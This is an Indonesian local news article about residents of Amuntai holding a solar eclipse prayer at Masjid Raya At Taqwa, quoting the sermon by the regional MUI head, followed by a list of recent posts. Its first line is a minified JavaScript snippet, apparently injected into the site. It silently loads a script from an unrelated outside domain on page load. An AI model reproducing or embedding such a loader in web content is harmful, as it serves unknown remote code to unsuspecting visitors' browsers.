(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Takjub akan Fenomena Alam, Warga Gelar Shalat Gerhana


AMUNTAI, Ratusan warga Amuntai memaknai fenomena alam gerhana matahari cincin ditunjukkan dengan bersujud kepada-NYA melalui shalat sunnah Kusuf (shalat gerhana) berjamaah di Masjid Raya At Taqwa, kota Amuntai, Kamis (26/12).

Shalat  gerhana matahari dilaksanakan sehabis shalat zhuhur  dipimpin oleh Ustadz H Sajaruddin yang bertindak sebagai imam, sedangkan Ketua MUI HSU KH Said Maswaran Lc, bertindak sebagai khotib.

Dalam khotbahnya KH Said Masrawan mengatakan bahwa shalat sunah gerhana matahari ini merupakan bentuk rasa syukur kepada Allah SWT sebagai Sang Pencipta mahluk berserta alam dan isinya.

Hal ini dilakukan sebagai  penyaksian salah satu dari tanda kekuasaan dan keagungan-NYA yaitu terjadinya fenomena alam seperti gerhana matahari.

 

“Pada hari ini, pada detik ini, kita berkumpul di tempat yang mulia dan dimuliakan Allah ini, dengan hati yang penuh keikhlasan, dengan jiwa yang penuh pengharapan, dan dengan semangat yang di dalam dada kita, hanya untuk mengagungkan kebesaran Allah SWT,” ungkap KH Said Masrawan.

Dirinya menambahkan, terjadinya fenomena alam ini sebagai tanda keagungan serta kekuasaan Tuhan yang tidak terbatas.

“Bayangkanlah bahwa matahari, bulan, bumi dan benda-benda langit yang berjumlah miliaran, semuanya ada dalam kekuasaannya, semua ada dalam keteraturan yang Tuhan ciptakan,”  bebernya.

“Dengan ibadah shalat gerhana yang kita lakukan ini, kita berdoa semoga Allah mengumpulkan kita bersama Baginda Nabi Muhammad, para shahabat, dan orang-orang yang menghidupkan sunnah-sunnahnya,” harap Ketua MUI HSU.

Tampak ikut serta dalam Shalat gerhana kali ini Sekda HSU H Muhammad Taufik bersama sejumlah pejabat SKPD dan Forkopimda dilingkungan Pemkab HSU. (dew)

Reporter : Dew
Editor : Bie


Desy Arfianty

Recent Posts

Pj Bupati Kapuas Perpisahan dengan Dua Pejabat Purna Tugas

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi didampingi Pj Ketua TP PKK… Read More

7 menit ago

Curi Mobil Modus Duplikat Kunci, NY Diringkus Satreskrim Polresta Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - Satuan Reskrim Polresta Banjarmasin meringkus seseorang lelaki berinisial NY (37) karena melakukan… Read More

15 jam ago

Sah! Ini 30 Calon Terpilih Anggota DPRD HSU 2024-2029

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) menetapkan 30 perolehan… Read More

18 jam ago

Sebelum Dilantik, 30 Calon Terpilih DPRD Banjarbaru Harus Lapor Harta Kekayaan

KANALKALIMANTAN.COM, BANJARBARU – Calon terpilih Anggota Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru pada Pemilu… Read More

22 jam ago

Tiga Putra HSU Terbaik Pertama Syarhil Qur’an MTQ XXXV Kalsel

KANALKALIMANTAN.COM, RANTAU - Enam orang dari kafilah Kabupaten Hulu Sungai Utara (HSU) sukses meraih prestasi… Read More

22 jam ago

Resmi Ditetapkan, Ini 45 Calon Terpilih Anggota DPRD Banjarmasin 2024-2029

PAN, Golkar dan PKS Masing-masing 7 Kursi di DPRD Banjarmasin Read More

22 jam ago

This website uses cookies.